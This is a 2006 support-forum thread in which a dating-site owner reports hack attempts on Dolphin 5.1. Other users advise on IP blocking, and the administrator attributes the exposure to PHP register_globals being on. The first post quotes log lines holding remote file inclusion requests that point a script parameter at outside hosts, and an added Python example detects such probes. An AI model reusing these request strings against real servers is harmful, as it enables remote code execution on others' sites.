ModMySite Support Forum  
Post #1 by sillywabbit, 08-23-2006: Hack Attempts

Hi guys....
(Please forgive me Smoge if this is not good to post or the wrong place to post it).

I am posting this just for an FYI... especially to those who may be running dolphin 5.1

I have had SEVERAL hack attempts on my site the last few days. I have also had a lot of issues with spammers (now have up the .htaccess file... thanks guys!!). Because of the issues with the spammers, I was keeping a close eye on the stats. I noticed that I was getting several hits from searches coming from various search engines with the keywords being "2002-2006. product of boonex group."...... I thought this was rather strange.

Then I began noticing some file manipulation tactics in the stats and so I contacted my hosting company (I am a new customer with hostgator.com and a happy one!!).
Hostgator showed me that there is an exploit in 5.1
look here:
http://securitytracker.com/alerts/2006/Aug/1016692.html

I noticed that most of the IPs were in Amsterdam and Asia. I am hoping that the .htaccess file will take care of most of the banning of the IPs. Lots of bandwidth has been getting chewed by the hack attempts and the spammers.

I guess that hack attempts are always going to be inevitable... but to be honest... has left me feeling a bit shaken up.

This is what they looked like in the latest visitor stats:

Host: 85.249.133.178 /favicon.ico
Http Code: 404 Date: Aug 22 14:15:37 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7

|
|
|
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://forbidden-instincts.com/x?
Http Code: 406 Date: Aug 22 14:16:42 Http Version: HTTP/1.1 Size in Bytes: 382
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7








Host: 84.244.143.59 /favicon.ico
Http Code: 404 Date: Aug 22 13:46:11 Http Version: HTTP/1.0 Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

|
|
|
/templates/tmpl_dfl/scripts/index.php?img=2
Http Code: 200 Date: Aug 22 13:47:21 Http Version: HTTP/1.0 Size in Bytes: 419
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

|
|
|
/templates/tmpl_dfl/scripts/index.php?img=1
Http Code: 200 Date: Aug 22 13:47:21 Http Version: HTTP/1.0 Size in Bytes: 419
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

|
|
|
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://amrdiab.ir/cgi-bin/hadi.txt%3f
Http Code: 200 Date: Aug 22 13:47:25 Http Version: HTTP/1.0 Size in Bytes: 421
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6




Host: 202.154.186.30 /about_us.php
Http Code: 200 Date: Aug 22 12:39:08 Http Version: HTTP/1.0 Size in Bytes: 14508
Referer: http://a9.com/%22powered%20by%20Dolphin%22?pm=3
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/templates/tmpl_dfl/css/general.css
Http Code: 200 Date: Aug 22 12:39:15 Http Version: HTTP/1.0 Size in Bytes: 12665
Referer: http://www.christiandatingandchat.com/about_us.php
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/templates/tmpl_dfl/css/anchor.css
Http Code: 200 Date: Aug 22 12:39:28 Http Version: HTTP/1.0 Size in Bytes: 503
Referer: http://www.christiandatingandchat.com/about_us.php
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/favicon.ico
Http Code: 404 Date: Aug 22 12:39:35 Http Version: HTTP/1.0 Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://redhat.scient.co.jp/manual/crb.jpg?
Http Code: 200 Date: Aug 22 12:40:57 Http Version: HTTP/1.0 Size in Bytes: 4868
Referer: -
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
__________________
http://www.christiandatingandchat.com
Abledating 2.4.11A

http://www.thefuzzypeach.com/dating
6.02
********************
It's not the load that breaks you down; it's the way you carry it.
--Lena Horne
********************

Post #2 by sillywabbit, 08-24-2006: Any suggestions?

I am getting very frustrated right now.
I uploaded that .htaccess file and was hoping that would take care of much of the unwanted traffic.
This morning upon checking the stats though... I have discovered that I haven't had any traffic from Africa... although I am still getting the hackers visiting from Amsterdam and Asia and they are chewing up a ton of bandwidth. Amsterdam chewed up 10MB just this morning. I have been blocking individual IPs but they just seem to come back on a new one.
I don't get if they are just stupid or what.... but they are still trying to take the site down through that exploit that was in 5.1....... but it should be obvious to them now... that I am running 5.2 and it's just not going to work.

Is this something that I just need to ignore and accept the chewed bandwidth and the hack attempts? Part of the business so to speak?

Thanks,
Ann

Post #3 by ijk, 08-24-2006: block ip address ipaddress

Try going to www.dnsstuff.com and get more information about the IP address.
Also find out if the servers are blacklisted.
You will need to block IP ranges, which you can get by entering an IP in dnsstuff.com.

To get an idea of the IP range to block, check this out.
http://jodies.de/ipcalc


Now it depends on how ruthless you want to be. If you start blocking IP ranges, soon you will have them all blocked out, but quite a few innocent chaps as well, so it is a balancing act.

Also block free proxy servers.

You should get more info here
http://www.de.sorbs.net/
__________________
AE Version 4.0 IQ

Post #4 by sillywabbit, 08-31-2006: Thanks so much!!

Thanks so much for the info....

Have been down with the flu..... but will start checking into this ... Still the same thing going on..... mostly again..... from Amsterdam and Asia...

Thanks again,
Ann

Post #5 by Smoge (Administrator), 09-01-2006

Hi,

This is what we needed - some log entries.... we have now identified the hack...

Sorry I did not see SillyWabbit's post earlier - I had a busy week last week.

Does anyone know if BoonEx has made any announcements or comments about this issue yet?

Smoge
__________________
ModMySite Administrator

Problems? Questions? Need modifications or other help with your site?

Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.

Post #6 by Fuelme, 09-01-2006

Haven't seen anything on their free forums. Someone did have a link to here, and I have been able to find out more about the program here than at boonex, so I added a link here as well
__________________
Running Dolphin 5.2 Nulled

Post #7 by Smoge (Administrator), 09-01-2006

Well.... in reality - you should not run your server with "Register Globals" turned on.

You can check this if you make your own phpinfo file - and run it from your web browser. You can also find phpinfo in many server control panels.

Make a file called phpinfo3838.php (or some other random number - so others cannot easily run it!), with this inside.

PHP Code:
You must login or register to view the code on ModMySite.
Upload it to your webspace. Run from web browser.

If register globals says OFF OFF - you are ok.

If register globals is on, you need to ask your sysadmin why - or if you are the sysadmin - ask yourself why.

Register Globals is known to cause security issues with many scripts - not just aedating/dolphin.

Having it on is not recommended or desired for (almost all) php code users.

Smoge

Post #8 by Smoge (Administrator), 09-01-2006

Oh - and I should add..... if you have register globals off - and you see this stuff in your apache logs - just disregard as another hack "attempt" - not success.

I am willing to bet - but only she knows - that SillyWabbit's register globals is off too. Maybe she can check and tell us.

Smoge
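
An added example, not part of the original thread: one way to pull requests like the `dir[inc]=http://...` ones in the first post out of an Apache access log, including percent-encoded forms, and record whether the server rejected or served each one. The log lines are constructed samples in Apache combined format with documentation addresses and hostnames, and the function names are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample lines (documentation IPs and hostnames); only the request
# path and the dir[inc] parameter name are taken from the thread.
SAMPLE_LOG = """\
192.0.2.10 - - [22/Aug/2006:14:16:42 -0500] "GET /templates/tmpl_dfl/scripts/index.php?dir[inc]=http://remote.example/x? HTTP/1.1" 406 382 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Aug/2006:13:47:21 -0500] "GET /templates/tmpl_dfl/scripts/index.php?img=2 HTTP/1.0" 200 419 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Aug/2006:13:47:25 -0500] "GET /templates/tmpl_dfl/scripts/index.php?dir%5Binc%5D=http%3A%2F%2Fremote.example%2Fa.txt%3f HTTP/1.0" 200 421 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Aug/2006:12:39:08 -0500] "GET /about_us.php HTTP/1.0" 200 14508 "-" "Mozilla/5.0"
"""

# Captures: client IP, request target, status code, response size.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) (\S+)')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def find_inclusion_probes(log_text):
    """Return one record per query parameter whose decoded value is a remote URL."""
    probes = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, target, status, _size = m.groups()
        query = target.partition("?")[2]
        # parse_qsl percent-decodes names and values, so the encoded form
        # dir%5Binc%5D=http%3A%2F%2F... is caught as well as the plain one.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if value.strip().lower().startswith(REMOTE_SCHEMES):
                # 4xx/5xx: the server refused the request. Otherwise the script
                # ran, and the result depends on register_globals (post #8).
                outcome = "rejected" if int(status) >= 400 else "served"
                probes.append({"ip": ip, "param": name,
                               "status": int(status), "outcome": outcome})
    return probes


def probes_by_ip(probes):
    """Count probe requests per source address, most active first."""
    return Counter(p["ip"] for p in probes).most_common()


if __name__ == "__main__":
    for probe in find_inclusion_probes(SAMPLE_LOG):
        print(probe)
    print(probes_by_ip(find_inclusion_probes(SAMPLE_LOG)))
```

A "served" record only means the script answered; whether the remote file was actually included is decided by the register_globals setting checked in post #7.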

Post #9 by Fuelme, 09-01-2006

I went to her site a little bit ago and it looks like she took dolphin off and is putting up osdate.
Just an FYI

Post #10 by Smoge (Administrator), 09-01-2006

Yes - this is talked about in another post.

http://www.modmysite.com/dolphin-general-discussion-v5-0-v5-21/3140-i-dont-get.html

While it is good that SillyWabbit is concerned about security - so far, perhaps - both of her concerns were not warranted (assuming she has register_globals disabled)

Smoge